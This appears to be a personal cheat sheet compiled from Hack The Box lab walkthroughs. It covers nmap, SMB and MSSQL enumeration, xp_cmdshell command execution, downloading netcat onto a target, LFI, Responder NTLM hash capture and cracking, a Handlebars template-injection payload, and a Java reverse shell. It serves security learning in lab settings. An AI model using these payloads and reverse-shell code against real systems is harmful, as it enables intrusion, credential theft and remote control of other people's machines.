-v : Increase the verbosity level (basically output more info) -p- : This flag scans for all TCP ports ranging from 0-65535 -sV : Attempts to determine the version of the service running on a port -sC : Scan with default NSE scripts --min-rate : This is used to specify the minimum number of packets Nmap should send per second; it speeds up the scan as the number goes higher
-sC: Performs a script scan using the default set of scripts. It is equivalent to -- script=default. Some of the scripts in this category are considered intrusive and should not be run against a target network without permission. -sV: Enables version detection, which will detect what versions are running on what port.
nmap -v -p- --min-rate 5000 -sV -sC
nmap -sV -sC
nmap -p80,5040,5985,7680
nmap -p- -sV -sC
nmap firewall
nmap -sC -Pn IP
nmap -Pn IP
curl -v
return 302 not found
smbclient port 445
see shares
smbclient -L IP
smbclient -L IP -U Administrator
smbclient //IP/C$ -U Administrator smbclient -h IP
smbclient -N -L \\{TARGET_IP}\ -N : No password -L : This option allows you to look at what services are available on a server
└──╼ [★]$ mssqlclient.py LOGIN:PASS@ -windows-auth └──╼ [★]$ mssqlclient.py ARCHETYPE/sql_svc:M3g4c0rp123@ -windows-auth
SQL> xp_cmdshell dir SQL> xp_cmdshell whoami //print working directory pwd SQL> xp_cmdshell "powershell -c pwd"
Enumeration nmap -sC -sV {TARGET_IP}
smbclient -N -L \\{TARGET_IP}\ -N : No password -L : This option allows you to look at what services are available on a server
We located a couple of interesting shares. Shares ADMIN$ & C$ cannot be accessed as the Access Denied error states, however, we can try to access and enumerate the backups share by using the following command: smbclient -N \\{TARGET_IP}\backups
get prod.dtsConfig
git clone https://github.com/SecureAuthCorp/impacket.git cd impacket pip3 install .
cd impacket/examples/ python3 mssqlclient.py -h
python3 mssqlclient.py ARCHETYPE/sql_svc@{TARGET_IP} -windows-auth -windows-auth : this flag is specified to use Windows Authentication
SELECT is_srvrolemember('sysadmin');
EXEC xp_cmdshell 'net user';
EXEC sp_configure 'show advanced options', 1; RECONFIGURE; sp_configure;
- Enabling the sp_configure as stated in the above error message EXEC sp_configure 'xp_cmdshell', 1; RECONFIGURE;
xp_cmdshell "whoami"
sudo python3 -m http.server 80
sudo nc -lvnp 443
SQL> xp_cmdshell "powershell -c pwd" SQL> xp_cmdshell "powershell -c cd C:\Users\sql_svc\Downloads; wget -outfile nc64.exe"
gobuster dir --url http://ignition.htp/ --wordlist /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt
LFI or Local File Inclusion RFI or Remote File Inclusion
examples http://unika.htb/index.php?page=../../../../../../../../windows/system32/drivers/etc/hosts
Include PHP : https://www.php.net/manual/en/function.include.php
Windows New Technology LAN Manager
sudo responder -I tun0 http://unika.htb/index.php?page=//
subl hash (paste in this file the hash) Administrator::RESPONDER:3eadab5a430190d9:6206C352D675427BB3087B9EEBFFCA2A:010100000000000080EADEF0A27FD80177FDF3F5D7B9EBA40000000002000800470032004500430001001E00570049004E002D004400520049005500500052003100590045004300430004003400570049004E002D00440052004900550050005200310059004500430043002E0047003200450043002E004C004F00430041004C000300140047003200450043002E004C004F00430041004C000500140047003200450043002E004C004F00430041004C000700080080EADEF0A27FD801060004000200000008003000300000000000000001000000002000004DAC410366AD31A487458FD8E15A3ADF9D3B623141A688B2CD44B5A8784EE3600A0010000000000000000000000000000000000009001E0063006900660073002F00310030002E00310030002E00310034002E0033000000000000000000
└──╼ [★]$ john --wordlist=/usr/share/wordlists/rockyou.txt hash
connect to port 5985 with login / password
evil-winrm -i -u Administrator -p badminton
read file on system : cat flag.txt
login page : /admin
admin admin123 admin root123 admin password1 admin administrator1 admin changeme1 admin password123 admin qwerty123 admin administrator123 admin changeme123
Node.js webserver : express
vulnerability we test for by submitting {{7*7}} Server Side Template Injection
Templating engine : Handlebars name of the BurpSuite tab used to encode text : Decoder
Burpsuite (intercepting HTTP traffic) (linked with plugin foxyproxy)
Proxy -> HTTP history POST -> send to repeater
{{#with "s" as |string|}} {{#with "e"}} {{#with split as |conslist|}} {{this.pop}} {{this.push (lookup string.sub "constructor")}} {{this.pop}} {{#with string.split as |codelist|}} {{this.pop}} {{this.push "return process.mainModule.require('child_process').execSync('cat /root/flag.txt');"}} {{this.pop}} {{#each conslist}} {{#with (string.sub.apply 0 codelist)}} {{this}} {{/with}} {{/each}} {{/with}} {{/with}} {{/with}} {{/with}}
Reverse shell
netcat nc -lvnp 8000
String host=""; int port=8000; String cmd="/bin/bash"; Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();Socket s=new Socket(host,port);InputStream pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream();OutputStream po=p.getOutputStream(),so=s.getOutputStream();while(!s.isClosed()) {while(pi.available()>0)so.write(pi.read());while(pe.available()>0)so.write(pe.read()); while(si.available()>0)po.write(si.read());so.flush();po.flush();Thread.sleep(50);try {p.exitValue();break;}catch (Exception e){}};p.destroy();s.close();
bin analysis
binwalk file.bin binwalk -t file.bin
fdisk -l file.bin
ENTROPY binwalk -E file.bin Is it encrypted? High entropy = probably encrypted (or compressed). Low entropy = probably not
Extractor binwalk -e file.bin
telnet 1521
Search Tools grep -r "login" /etc/
Device_Admin in telnetd.sh password in etc/config/sign
- https://www.pcbgogo.com/GerberViewer.html
- https://maxpromer.github.io/LCD-Character-Creator/
- https://onlinehextools.com/convert-hex-to-binary
I2C communication :
Wire.h to communicate with the i2c devices, the library functions take the 7 bit address and internally appends the 0 or 1 onto the end for write/read.
7-bit I2C Slave Address 8-bit I2C Slave Address 10-bit I2C Slave Address https://www.totalphase.com/blog/2019/05/how-to-identify-the-i2c-slave-addressing-standard-for-developers/
LIQUID CRYSTAL LED https://www.arduino.cc/reference/en/libraries/liquidcrystal-i2c/
SMALI Dalvik opcodes http://pallergabor.uw.hu/androidblog/dalvik_opcodes.html https://hackcatml.tistory.com/category/Information%20Security/Android
Conditional jump branch:
"if-eq vA, vB, :cond_ " If vA is equal to vB then go to: cond_ "if-ne vA, vB, :cond_ " If vA is not equal to vB then go to: cond_ "if-lt vA, vB , :cond_ " if vA is less than vB then go to: cond_ "if-ge vA, vB, :cond_ " if vA is greater than or equal to vB then go to: cond_ "if-gt vA, vB, :cond_ " if vA is greater than vB then jump to: cond_ "if-le vA, vB, :cond_ " If vA is less than or equal to vB then jump to: cond_ "if-eqz vA, :cond_ " If vA is equal to 0 then jump to: cond_ "if -nez vA, :cond_ "If vA is not equal to 0, jump to: cond_ "if-ltz vA, :cond_ " If vA is less than 0, jump to: cond_ "if-gez vA, :cond_ " If vA is greater than or equal to 0 jump to :cond_ "if-gtz vA, :cond_ " If vA is greater than 0 jump to :cond_ "if-lez vA, :cond_ " Jump to :cond_ if vA is less than or equal to 0
Host: #add directly (without opening hosts file) echo " thetoppers.htb" | sudo tee -a /etc/hosts
Use an enumeration tool like wfuzz
, ffuf
ffuf -c -w /usr/share/SecLists/Discovery/DNS/subdomains-top1million-20000.txt -u http://thetoppers.htb -H "Host: FUZZ.thetoppers.htb"
ffuf -c -w /usr/share/SecLists/Discovery/DNS/subdomains-top1million-20000.txt -u http://thetoppers.htb -H "Host: FUZZ.thetoppers.htb" -fs 11952
---Enumeration with Gobuster ----
gobuster vhost -w /opt/useful/SecLists/Discovery/DNS/subdomains-top1million-5000.txt -u http://thetoppers.htb
tldr https://github.com/tldr-pages/tldr sudo pip3 install tldr
-b : the maximum size of the wordlist (requires -o START) -c : numbers of lines to write to the wordlist (requires -o START) -d : limit the number of duplicate characters -e : stop generating words at a certain string -f : specify a list of character sets from the charset.lst file -i : invert the order of characters in the wordlist -l : allows the literal interpretation of @,%^ when using -t -o : the output wordlist file -p : print permutations without repeating characters (cannot be used with -s) -q : Like the -p option except it reads the strings from a specified file -r : resume a previous session (cannot be used with -s) -s : specify a particular string to begin the wordlist with -t : set a specific pattern of @,%^ -z : compress the output wordlist file, accompanied by -o
Reference: @ represents lowercase letters , represents uppercase letters % represents numbers ^ represents special characters
crunch 5 5 abcde14 -t @@@14 -d 2@ -o syskey.txt -z
A zipped syskey.txt wordlist starting with "aab14" and ending in "eed14" will be produced from the above. The reason why the start is not "aaa14" is because -d 2@ allows for only 2 duplicate lowercase letters. Adding -i would invert the results, and adding -e dde14 would stop after the line "dde14" (or "41edd" in the case of an inverted output) is produced.
Mongod Write-up
Connecting to MongoDB In order to connect to the remote MongoDB server running on the target box, we will need to install the mongodb utility, which can be done on Debian-based Linux distributions (like Parrot, Kali and Ubuntu) by downloading the following tar archive file. We must then extract the contents of the tar archive file using the tar utility. Navigate to the location where the mongo binary is present. Let's now try to connect to the MongoDB server running on the remote host as an anonymous user. We have successfully connected to the remote MongoDB instance as an anonymous user. We can list the databases present on the MongoDB server using the following command.
curl -O https://fastdl.mongodb.org/linux/mongodb-linux-x86_64-3.4.7.tgz
tar xvf mongodb-linux-x86_64-3.4.7.tgz
cd mongodb-linux-x86_64-3.4.7/bin
./mongo mongodb://{target_IP}:27017
S3 bucket
aws configure
aws --endpoint=http://s3.thetoppers.htb s3 ls aws --endpoint=http://s3.thetoppers.htb s3 ls s3://thetoppers.htb